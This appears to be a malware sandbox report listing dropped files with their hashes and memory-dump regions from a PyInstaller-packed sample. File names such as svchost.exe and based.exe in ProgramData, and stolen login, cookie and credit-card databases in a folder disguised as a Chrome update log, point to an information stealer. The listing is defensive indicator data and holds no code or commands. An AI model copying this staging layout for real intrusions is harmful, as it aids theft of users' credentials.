SHA512 7e6c2591805136f74c413b9633d5fdc4428e6f01e0e632b278bee98170b4f418ef2afd237c09e60b0e72076924ed0e3ffb0e2453e543b5e030b263f64568fab8

C:\Users\Admin\AppData\Local\Temp\_MEI47122\_ssl.pyd

MD5 a4dba3f258344390ee9929b93754f673
SHA1 75bbf00e79bb25f93455a806d0cd951bdd305752
SHA256 e0aa8cfa2e383820561bce2aee35b77a6902ff383076c237c7859cd894d37f49
SHA512 6201e0d840f85d1627db849bfaf4a32f6fc0634a16416074fe6d13329317520b0a06806ad3337a3370dcc1c1e3d1910d18c823c6a7a62efe400de36b28d1767a

memory/4256-129-0x00007FF92FB90000-0x00007FF92FB9F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI47122\_sqlite3.pyd

MD5 dde6bab39abd5fce90860584d4e35f49
SHA1 23e27776241b60f7c936000e72376c4a5180b935
SHA256 c84e5f739ce046b4582663a3017f31fe9ae5e706e087ac4c5ff11c7bba07b5f9
SHA512 8190c6befbe660096363409cb82977e9dce5ab9a78c60f3d3db9dc08a2300504f9b2058d8cfb740d7a17995267d8005392ee0f1a03fb74030286fbc7a9c287de

C:\Users\Admin\AppData\Local\Temp\_MEI41882\s.exe

MD5 27f54b8ffba5339a1f22a6d1e3103c8a
SHA1 b152f2662b51b7f76638ad44b81a49df55d63a89
SHA256 6206934af795aa5ed4987f8b7f157e0b38b8fcd160b5ca7199b55c9c095c6410
SHA512 0ab953b9229374b8667a701d70849d853f721992c4b58661b44275887214c908a71253127b76ec9a5b53e04a9277a75fc65854162397f8e448b3faba7cd6409b

C:\Users\Admin\AppData\Local\Temp\_MEI47122\_queue.pyd

MD5 f9d8b75ccb258b8bc4eef7311c6d611d
SHA1 1b48555c39a36f035699189329cda133b63e36b5
SHA256 b3d9763fc71b001a1a2cc430946933e3832f859eb7857b590f8daeef8017179c
SHA512 cbf8490501b002eec96ae6c1fa4f3684aa1cab1e63025087df92c0e857299b9b498bff91c1f301f926ff86e0dc81e8f0c17db992366bed3cd9f41bcae43542db

memory/4256-141-0x00007FF916500000-0x00007FF91651F000-memory.dmp

memory/4256-147-0x00007FF916330000-0x00007FF91635E000-memory.dmp

memory/4256-157-0x00007FF916130000-0x00007FF916248000-memory.dmp

memory/4256-154-0x00007FF927600000-0x00007FF92760D000-memory.dmp

memory/4256-153-0x00007FF916250000-0x00007FF916265000-memory.dmp

C:\ProgramData\main.exe

MD5 0d0ff3d49b2d0feea89f488c5e46ac48
SHA1 66477b9e6160e85a19e3d0778505cad2f5652218
SHA256 01b64236bcdc022105519c07351d13c393ad8dd3f21a91b3396132f9fbefc5a2
SHA512 1f083cb5ba9699fedfbc934333f2966541a4e557c65f2b61c655fe7cb7515b54fdcf5dc4e22e61c953f4163917f9f342c8fbb2f186089716bf72c87cbba5d185

memory/3860-167-0x0000025674230000-0x00000256747D0000-memory.dmp

memory/3860-171-0x0000025676C30000-0x0000025676CA6000-memory.dmp

C:\ProgramData\setup.exe

MD5 2f010cc144931a83c7c988fa552cfe48
SHA1 b12c968318acd536f77751afbcb565f73589d7bc
SHA256 8ce3c918bfeb5a322f7446ef4e969749db13819ce705d6e8359315bf92bb9a3d
SHA512 d9427aec2f7702a484fbae0dbd4efc934f7641f8f15cf756e44f0aed01e149dfacb7ab870cfa27c71f53c84c8b6d6b8428590135e9d3d7bfeed7a551c7528c06

memory/3860-304-0x00000256763D0000-0x00000256763EE000-memory.dmp

memory/2300-303-0x0000020AA1020000-0x0000020AA1042000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rah3fkaz.lrz.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5488-415-0x00000234EBF30000-0x00000234EBF31000-memory.dmp

memory/5488-413-0x00000234EBF30000-0x00000234EBF31000-memory.dmp

memory/5488-411-0x00000234EBF30000-0x00000234EBF31000-memory.dmp

memory/5488-409-0x00000234EBF30000-0x00000234EBF31000-memory.dmp

memory/5488-407-0x00000234EBF30000-0x00000234EBF31000-memory.dmp

memory/5488-405-0x00000234EBF30000-0x00000234EBF31000-memory.dmp

memory/5488-403-0x00000234EBF30000-0x00000234EBF31000-memory.dmp

memory/5904-1632-0x00000254F64F0000-0x00000254F64F8000-memory.dmp

C:\ProgramData\шева.txt

MD5 1207bc197a1ebd72a77f1a771cad9e52
SHA1 8ed121ff66d407150d7390b9276fe690dd213b27
SHA256 260658b9cb063d6ce96f681b18704e02fae7bf8fc995fc249ab0be1400983476
SHA512 d037cfa3b6e6ced9652b2c781bb54cf48dbaa0aaff05039ae4fd0122749eda472807d4198981aa6ceffeba6d2b23d7ad08d7d96983dbd8539cf6b07e46e157f4

C:\ProgramData\svchost.exe

MD5 69d8a33b1535e7e4a988f9583e07c264
SHA1 44d28b0268a32ebee33f047b34aeaafbd64994a4
SHA256 fce39a889b720eb82441f81a01ce8f3b8606ba2cbc03a59a1830d9817678ffa2
SHA512 a9b8679443dbe294ddc1a9faaf435db0957b3d10ad748ccd41fc2e100bf409150cfb214e1b170f703d7579e5164f34c1dc8d3cad8ddc13da6d6e6cac3339260f

C:\Users\Admin\AppData\Local\Temp\_MEI47122\sqlite3.dll

MD5 ad4bcb50bb8309e4bbda374c01fab914
SHA1 a299963016a3d5386bf83584a073754c6b84b236
SHA256 32c0978437c9163bb12606607e88701dd79400cdde926d890cdbf6334c2b8435
SHA512 ba6bfa3c27fa4285eeb2978ff17cba94375d84d7c0f79150d1f2f7163c80c347b84d712da83435e8d13e27ed59ea0375edb5af2ea1ba67b2c77b6dfcb62ad65a

C:\Users\Admin\AppData\Local\Temp\_MEI47122\rarreg.key

MD5 4531984cad7dacf24c086830068c4abe
SHA1 fa7c8c46677af01a83cf652ef30ba39b2aae14c3
SHA256 58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211
SHA512 00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

C:\Users\Admin\AppData\Local\Temp\_MEI47122\rar.exe

MD5 9c223575ae5b9544bc3d69ac6364f75e
SHA1 8a1cb5ee02c742e937febc57609ac312247ba386
SHA256 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213
SHA512 57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

C:\Users\Admin\AppData\Local\Temp\_MEI47122\libssl-1_1.dll

MD5 7bcb0f97635b91097398fd1b7410b3bc
SHA1 7d4fc6b820c465d46f934a5610bc215263ee6d3e
SHA256 abe8267f399a803224a1f3c737bca14dee2166ba43c1221950e2fbce1314479e
SHA512 835bab65d00884912307694c36066528e7b21f3b6e7a1b9c90d4da385334388af24540b9d7a9171e89a4802612a8b6523c77f4752c052bf47adbd6839bc4b92c

C:\Users\Admin\AppData\Local\Temp\_MEI47122\bound.blank

MD5 4e64c4af3ba21f6a4b570085f74b9e1d
SHA1 37ec78f6ab0e7172894bf7bed9eeeb14fd1766db
SHA256 f029c646ed9221360ce5a3ce4e68c301f429c5333200f90740fd99358d9c4079
SHA512 dd84083f3c85760e2f31e060f1e7e3033781846fdac18d70dec164d07704ff40206270ba8e9a1825e3aa28a335440e7fc44e071edf448349dc67dde60b9202c0

C:\Users\Admin\AppData\Local\Temp\_MEI47122\blank.aes

MD5 86b250c6c03decca2067faed381f17f9
SHA1 8662d454df60b76bf14ba2e193de44e443aa13cb
SHA256 e982bd6ffe7ca7731d9ed4ee10ffce0ab9e6493a5ac3cf3e8e895958c4e513fd
SHA512 67dbdb0b2b3fc4307200546bb347506f006e60fe530d178ed7aca9a3a69990784c12e72b6a0487d8f688b45e59b6ff5a53230735841ba1dab82600ac20d576d1

C:\Users\Admin\AppData\Local\Temp\_MEI47122\libffi-7.dll

MD5 6f818913fafe8e4df7fedc46131f201f
SHA1 bbb7ba3edbd4783f7f973d97b0b568cc69cadac5
SHA256 3f94ee4f23f6c7702ab0cc12995a6457bf22183fa828c30cc12288adf153ae56
SHA512 5473fe57dc40af44edb4f8a7efd68c512784649d51b2045d570c7e49399990285b59cfa6bcd25ef1316e0a073ea2a89fe46be3bfc33f05e3333037a1fd3a6639

C:\Users\Admin\AppData\Local\Temp\_MEI41882\_socket.pyd

MD5 819166054fec07efcd1062f13c2147ee
SHA1 93868ebcd6e013fda9cd96d8065a1d70a66a2a26
SHA256 e6deb751039cd5424a139708475ce83f9c042d43e650765a716cb4a924b07e4f
SHA512 da3a440c94cb99b8af7d2bc8f8f0631ae9c112bd04badf200edbf7ea0c48d012843b4a9fb9f1e6d3a9674fd3d4eb6f0fa78fd1121fad1f01f3b981028538b666

C:\Users\Admin\AppData\Local\Temp\_MEI41882\_lzma.pyd

MD5 7447efd8d71e8a1929be0fac722b42dc
SHA1 6080c1b84c2dcbf03dcc2d95306615ff5fce49a6
SHA256 60793c8592193cfbd00fd3e5263be4315d650ba4f9e4fda9c45a10642fd998be
SHA512 c6295d45ed6c4f7534c1a38d47ddc55fea8b9f62bbdc0743e4d22e8ad0484984f8ab077b73e683d0a92d11bf6588a1ae395456cfa57da94bb2a6c4a1b07984de

C:\Users\Admin\AppData\Local\Temp\_MEI41882\_hashlib.pyd

MD5 d4674750c732f0db4c4dd6a83a9124fe
SHA1 fd8d76817abc847bb8359a7c268acada9d26bfd5
SHA256 caa4d2f8795e9a55e128409cc016e2cc5c694cb026d7058fc561e4dd131ed1c9
SHA512 97d57cfb80dd9dd822f2f30f836e13a52f771ee8485bc0fd29236882970f6bfbdfaac3f2e333bba5c25c20255e8c0f5ad82d8bc8a6b6e2f7a07ea94a9149c81e

C:\Users\Admin\AppData\Local\Temp\_MEI41882\_decimal.pyd

MD5 20c77203ddf9ff2ff96d6d11dea2edcf
SHA1 0d660b8d1161e72c993c6e2ab0292a409f6379a5
SHA256 9aac010a424c757c434c460c3c0a6515d7720966ab64bad667539282a17b4133
SHA512 2b24346ece2cbd1e9472a0e70768a8b4a5d2c12b3d83934f22ebdc9392d9023dcb44d2322ada9edbe2eb0e2c01b5742d2a83fa57ca23054080909ec6eb7cf3ca

C:\Users\Admin\AppData\Local\Temp\_MEI41882\_bz2.pyd

MD5 86d1b2a9070cd7d52124126a357ff067
SHA1 18e30446fe51ced706f62c3544a8c8fdc08de503
SHA256 62173a8fadd4bf4dd71ab89ea718754aa31620244372f0c5bbbae102e641a60e
SHA512 7db4b7e0c518a02ae901f4b24e3860122acc67e38e73f98f993fe99eb20bb3aa539db1ed40e63d6021861b54f34a5f5a364907ffd7da182adea68bbdd5c2b535

C:\Users\Admin\AppData\Local\Temp\_MEI41882\unicodedata.pyd

MD5 81d62ad36cbddb4e57a91018f3c0816e
SHA1 fe4a4fc35df240b50db22b35824e4826059a807b
SHA256 1fb2d66c056f69e8bbdd8c6c910e72697874dae680264f8fb4b4df19af98aa2e
SHA512 7d15d741378e671591356dfaad4e1e03d3f5456cbdf87579b61d02a4a52ab9b6ecbffad3274cede8c876ea19eaeb8ba4372ad5986744d430a29f50b9caffb75d

C:\Users\Admin\AppData\Local\Temp\_MEI41882\select.pyd

MD5 a653f35d05d2f6debc5d34daddd3dfa1
SHA1 1a2ceec28ea44388f412420425665c3781af2435
SHA256 db85f2f94d4994283e1055057372594538ae11020389d966e45607413851d9e9
SHA512 5aede99c3be25b1a962261b183ae7a7fb92cb0cb866065dc9cd7bb5ff6f41cc8813d2cc9de54670a27b3ad07a33b833eaa95a5b46dad7763ca97dfa0c1ce54c9

C:\Users\Admin\AppData\Local\Temp\_MEI41882\s.exe

MD5 9cb4a715a0a55a87b1fe395d30c1be08
SHA1 65f511ed4713e4b098168638a133f5e2ccf1e1a0
SHA256 3445137618c7e46821bb1d97c7851f603ff4a10ab129a287bde53d7c3ce60d98
SHA512 8adc598cfc85365091f39b05412f47bdf0eabb698612a84cf7c1cc30db406d22d5199b0af4a12551277461f21e26f00417bd8a8ca0e4cf096d068bfba108ab52

C:\Users\Admin\AppData\Local\Temp\_MEI41882\libcrypto-1_1.dll

MD5 624b818e9591e2d483b9202d06b9fba3
SHA1 47f287a9aad5532575e8ed7f7c7f57e50a648b03
SHA256 274f2f7d58bd6a1f969a8b0d5d2ccc9fddb62398ad3f6fa042d16f7b4fd26fbd
SHA512 52273689c69e51f70639b05646d75265c8cebc6dc31ce7146e020d5e2d5c5ee1eb2b7c025183f68daf90d9863cf7416a674514489186ae26b2e90df406dde4aa

C:\Users\Admin\AppData\Local\Temp\_MEI47122\base_library.zip

MD5 c4989bceb9e7e83078812c9532baeea7
SHA1 aafb66ebdb5edc327d7cb6632eb80742be1ad2eb
SHA256 a0f5c7f0bac1ea9dc86d60d20f903cc42cff3f21737426d69d47909fc28b6dcd
SHA512 fb6d431d0f2c8543af8df242337797f981d108755712ec6c134d451aa777d377df085b4046970cc5ac0991922ddf1f37445a51be1a63ef46b0d80841222fb671

C:\Users\Admin\AppData\Local\Temp\_MEI41882\python310.dll

MD5 7340d4ba06dd8fec5319f838eb2ec78b
SHA1 384e5dd50bf76e5a4ce4d60cda71d435c0deddbf
SHA256 dc89a70fe4b6cbc0e493ca97888e3e144a038de96b181c70c869ff7498af3996
SHA512 bcbbe9963e1aff9d24d90fa0c579d7597ff44123d6675060c33778e9eac649dd616473547b3df7de160510fe7ea51ba284b7ef781d2b45db3897a36f0eedc276

C:\ProgramData\Microsoft\based.exe

MD5 623884aa7d9185f3220e04d702f3a33c
SHA1 61f2c874ad5154f240bca3c2f0515579f0e4d480
SHA256 040944684bf8824f1ab6b8d96b8b2a067ff8bac322889d3f55c00fb884e32fd7
SHA512 dcce2612086d5a7308379b0f413896fc1476f0747a7b001479e18f89a07f95842938b85bbb16ae81c994dce1908ca8ecae4016b9ff9e46786b1fce64dd6f26e8

C:\ProgramData\Microsoft\based.exe

MD5 831b246678c030e9afbb7efb8ce70e16
SHA1 4981e6863e830a2bb6b1f1d933ee779c6c00b533
SHA256 3936d7a71ccd094b500a8ff0da889174653855aafd97b74f3c0a1151427e4dfa
SHA512 9229a4ffa19546b43ab98f856232df0907acbf64a0f27700b073bc4e187b2b608b2542efe9c48af55c64ec6010bf74c5688edd67b427fca187c3bc5b06544a10

C:\ProgramData\Microsoft\based.exe

MD5 4eb398a03b6eed1979a91d35cc23cff5
SHA1 f01087db98af2c81be0313284eeeba89b0edb7a1
SHA256 45a0883333f6f81a1fbd915db826bc2b8a9a2c6002f09a29450ba56576d90f3d
SHA512 8a33f5f844074fc7951fceccf32e8ed1bdbdce488d1a17685b345736d94ca3f2e3e00263df19c7b2c5b53186addf9630ee2ee57fb73c9abbc29a6458ab01ef45

C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\login_data_db

MD5 349e6eb110e34a08924d92f6b334801d
SHA1 bdfb289daff51890cc71697b6322aa4b35ec9169
SHA256 c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a
SHA512 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\credit_cards_db

MD5 7e58c37fd1d2f60791d5f890d3635279
SHA1 5b7b963802b7f877d83fe5be180091b678b56a02
SHA256 df01ff75a8b48de6e0244b43f74b09ab7ebe99167e5da84739761e0d99fb9fc7
SHA512 a3ec0c65b2781340862eddd6a9154fb0e243a54e88121f0711c5648971374b6f7a87d8b2a6177b4f1ae0d78fb05cf0ee034d3242920301e2ee9fcd883a21b85e

C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\downloads_db

MD5 73bd1e15afb04648c24593e8ba13e983
SHA1 4dd85ca46fcdf9d93f6b324f8bb0b5bb512a1b91
SHA256 aab0b201f392fef9fdff09e56a9d0ac33d0f68be95da270e6dab89bb1f971d8b
SHA512 6eb58fb41691894045569085bd64a83acd62277575ab002cf73d729bda4b6d43c36643a5fa336342e87a493326337ed43b8e5eaeae32f53210714699cb8dfac7

C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\cookies_db

MD5 42c395b8db48b6ce3d34c301d1eba9d5
SHA1 b7cfa3de344814bec105391663c0df4a74310996
SHA256 5644546ecefc6786c7be5b1a89e935e640963ccd34b130f21baab9370cb9055d
SHA512 7b9214db96e9bec8745b4161a41c4c0520cdda9950f0cd3f12c7744227a25d639d07c0dd68b552cf1e032181c2e4f8297747f27bad6c7447b0f415a86bd82845

C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\credit_cards_db

MD5 f70aa3fa04f0536280f872ad17973c3d
SHA1 50a7b889329a92de1b272d0ecf5fce87395d3123
SHA256 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA512 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\downloads_db

MD5 9618e15b04a4ddb39ed6c496575f6f95
SHA1 1c28f8750e5555776b3c80b187c5d15a443a7412
SHA256 a4cd72e529e60b5f74c50e4e5b159efaf80625f23534dd15a28203760b8b28ab
SHA512 f802582aa7510f6b950e3343b0560ffa9037c6d22373a6a33513637ab0f8e60ed23294a13ad8890935b02c64830b5232ba9f60d0c0fe90df02b5da30ecd7fa26
